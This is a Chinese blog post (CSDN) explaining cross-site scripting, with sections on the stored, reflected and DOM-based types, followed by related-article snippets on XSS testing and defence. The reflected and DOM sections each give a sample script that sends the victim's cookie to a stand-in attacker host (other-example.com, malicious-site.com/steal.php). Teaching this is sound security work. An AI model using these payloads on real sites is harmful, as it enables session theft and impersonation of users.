[安全] 了解 XSS 攻击

已于 2023-09-24 11:57:20 修改
阅读量106 收藏
点赞数
分类专栏: 安全 文章标签: 安全 xss 前端
于 2023-09-24 11:55:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46828094/article/details/133236390
版权

XSS 全称 Cross-site Scripting 中文译为跨站脚本,常用来表示为跨站脚本攻击,是一种安全漏洞。攻击者会利用这一漏洞向 Web 网站注入恶意代码(js 脚本代码),恶意代码在用户浏览器上一旦被执行,攻击者就有可能通过 Cookie 或 localStorage 拿到受害者的网站身份信息,从而突破网站身份限制,冒充受害者身份来进行破坏及其他违法操作。

存储型 XSS

注入的恶意脚本代码,会保存在服务器上,一旦用户使用浏览器请求数据的时候,恶意代码会被回传回来并在浏览器上执行。比较典型的场景案例是发表评论,攻击者
通过评论输入框输入一段恶意代码(可以为任意浏览器可执行代码),点击提交按钮发表评论,此时恶意代码将会被保存到服务器数据库,其他受害者用户浏览该网页的时候评论内容(即恶意代码)将会被回传回来并执行。

比如尝试提交一条含有恶意代码的评论,如果提交成功了那将会是一件很危险的事。

在这里插入图片描述

反射型 XSS

攻击者将恶意代码包含在 URL 上,诱导用户点击,一旦用户点击了,恶意代码将会在用户浏览器中运行。

比如恶意链接:将你的掘金 Cookie 信息发送到恶意网站。

https://juejin.cn/?query=<script>window.location='http://other-example.com?cookie=' + document.cookie'</script>

在有做 xss 攻击防护的网站,一般是不能访问成功的,比如访问上面的掘金恶意链接是这样的。

在这里插入图片描述

基于 DOM 的 XSS

攻击者诱导受害者点击恶意链接,恶意链接包含修改网页 dom 结构的 js 代码

http://example.com/page#<script>document.location='https://malicious-site.com/steal.php?cookie='+document.cookie;</script>
zjl_712、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Web安全性测试之XSS
01-31
XSS 全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。...作为测试人员,需要了解XSS的原理,攻击场景,如何修复。才能有效的防止XSS的发生。假如有下面一个textbox<inputtype=
Web安全漏洞之XSS攻击
特困生Kuel的博客
12-30 293
什么是 XSS 攻击 XSS(Cross-Site Scripting)又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行。XSS是一种经常出现在 Web 应用程序中的计算机安全漏洞,是由于 Web 应用程序对用户的输入过滤不足而产生的。 常见的 XSS 攻击有三种:反射型、DOM-based 型、存储型。 其中反射型、DOM-based 型可以归类为非持久型 XSS 攻击,存储型归类为持久型 XSS 攻击。 1.反射型 反射型 XSS 一般是攻击者通过特定手法(如电子邮件),诱使用户去访问一个
XSS 攻击是什么?
fe_watermelon的博客
08-07 2084
大家好,我是前端西瓜哥。今天我们来了解一下 XSS 攻击
什么是xss攻击
小伟的博客
04-10 4486
跨站脚本攻击(XSS),英文全称 Cross Site Script   XSS攻击,一般是指黑客通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式   XSS攻击分为三种,反射型XSS、存储型XSS、DOM Based XSS. 了解什么是xss攻击,例子:   本地服务器demo目录下有个index.php,通过提交信息显示在页面上显示数据。   正常情况下:http:localhost/demo/index.php?name=张三,   网页上就会显
XSS攻击
刘皇叔说Java的博客
04-15 973
跨站脚本攻击XSS,Cross-Site Scripting)是一种常见的安全漏洞,攻击者利用此漏洞向网页中插入恶意的客户端脚本,从而在用户的浏览器中执行恶意代码。攻击者通常利用 XSS 攻击来窃取用户的信息、会话令牌,或者篡改网页内容等。
前端安全问题XSS攻击
zhukehan24的博客
08-19 293
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 xss的分类 xss的分类有,反射型、存储型、DOM型。具体就不做解释,师傅们应该也都懂,不懂的师傅百度上也很容易查
XSS攻击修改服务器的代码,Web安全系列之XSS攻击
weixin_36202642的博客
08-11 1588
什么是XSS攻击XSS(Cross Site Scripting)中文名称是:跨站脚本攻击XSS重点不在跨站,而在于执行的脚本。XSS的原理是指攻击者利用网站的安全漏洞,向web页面中插入一段恶意的script代码,当用户浏览网页时,执行脚本,攻击者就可以非法获取用户的敏感信息(如cookie、账号密码等),从而达到攻击的目的。XSS的类型从攻击代码的工作方式可以分为三个类型:1、反射型XSS。...
xss攻击突破转义_WEB安全XSS攻击方式与防御方式
weixin_39520393的博客
11-21 854
上一期给大家简单介绍XSS以及其操作,本期将带大家了解XSS比较常见的攻击方式与防御方式,一起去了解一下~XSS 常见攻击方法1、绕过 XSS-Filter,利用 <> 标签注入 Html/JavaScript 代码;2、利用 HTML 标签的属性值进行 XSS 攻击。例如:<img src=“javascript:alert(‘xss’)”/>;(当然并不是所有的 Web...
【前端安全系列】【万字详解】如何防止XSS攻击
pakerder的博客
12-10 390
跨站脚本攻击XSS)是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击XSS 的本质是:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。而由于直接在用户的终端执行,恶意代码能够直接获取用户的信息,或者利用这些信息冒充用户向网站发起攻击者定义的请求。在部分情况下,由于输入的限制,注入的恶意脚本比较短。但可以通过引入外部的脚本,并由浏览器执行,来完成比较复杂的攻击策略。
Springboot 阻止XSS攻击
热门推荐
果然的博客
11-24 1万+
Springboot中阻止XSS攻击 写在前面 写此文章的目的是为了记录一下在工作中解决的 XSS漏洞 问题。 XSS漏洞是生产上比较常见的问题。虽然是比较常见并且是基本的安全问题,但是我们没有做????️ ,也怪我没有安全意识。于是终于有一天被制裁了。所以这次就补上了,记录一下。 看看问题 XSS 漏洞到底是什么,说实话我讲不太清楚。但是可以通过遇到的现象了解一下。在前端Form表单的输入框中,用户没有正常输入,而是输入了一段代码:</input><img src=1 onerror=a
软件安全测试-Web安全测试详解-XSS攻击
白天像蚂蚁一样工作,晚上像蝴蝶一样生活
12-10 2010
通过该文,可以系统了解xss攻击的原理,测试,防御,无论对手工测试,还是自动化测试都可以很好的根据文章执行。
Web应用安全XSS通过JavaScript攻击(实验).docx
06-20
了解XSS攻击原理。 二、实验内容 在Kali上安装beef-xss工具; 在站点上进行XSS JavaScript攻击。 (附加题)使用beef尝试更多XSS JavaScript功能。 三、实验内容与步骤 在Kali上安装beef-xss工具: 1.1、首先打开...
Web安全测试之XSS实例讲解
01-19
作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。 阅读目录 XSS 是如何发生的 HTML Encode XSS 攻击场景 XSS漏洞的修复 如何测试XSS漏洞 HTML Encode 和URL Encode的区别
Web应用安全:简单XSS测试脚本(实验).docx
06-19
了解XSS攻击原理。 二、实验内容 在主机上搭建pikachu站点; 在站点上进行简单XSS测试脚本。 三、实验内容与步骤 在主机上搭建pikachu站点: 1.1、pikachu站点上集成了许多XSS测试的平台,在这里搭建便于对XSS进行...
Web应用安全:反射型XSS.pptx
06-18
反射型XSS攻击流程 目录 反射型XSS简介 反射性xss一般指攻击者通过特定的方式来诱惑受害者去访问一个包含恶意代码的URL。当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。 反射性XSS又...
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
爱笑的源码博客
05-14 976
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 366
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
如何确保您的Token安全:防范常见威胁与最佳实践
fudaihb的博客
05-14 968
Token安全是网络安全领域的一个重要方面,尤其是在现代应用程序中,token常常用于身份验证和会话管理。本文将探讨如何保护token不受常见威胁的侵害,并提供一些最佳实践来增强token的安全性。
vulhub xss攻击复现
05-01
Vulhub是一个开源的靶场环境,其中包含很多常见漏洞的复现环境。在使用Vulhub进行复现时,我们可以学习并掌握如何攻击及防御这些漏洞。 XSS攻击(跨站脚本攻击)是一种常见的Web安全漏洞,攻击者可以通过注入恶意脚本来窃取用户的敏感信息或者控制用户的浏览器。在Vulhub中,我们可以找到多种XSS漏洞的复现环境,如DOM-XSS、反射型XSS等。 在进行XSS漏洞复现时,需要首先了解XSS攻击的原理和方式,然后根据复现环境中给出的提示或者源代码进行相关的操作。例如,在DOM-XSS漏洞复现环境中,我们需要使用浏览器的开发者工具查看网页源代码,并找到相关的input字段,然后输入恶意脚本,提交表单即可触发XSS攻击。 需要注意的是,在进行XSS漏洞复现时,我们需要对攻击的范围和影响有一个清晰的认识,同时不要直接在真实网站上进行测试,以免不必要的安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值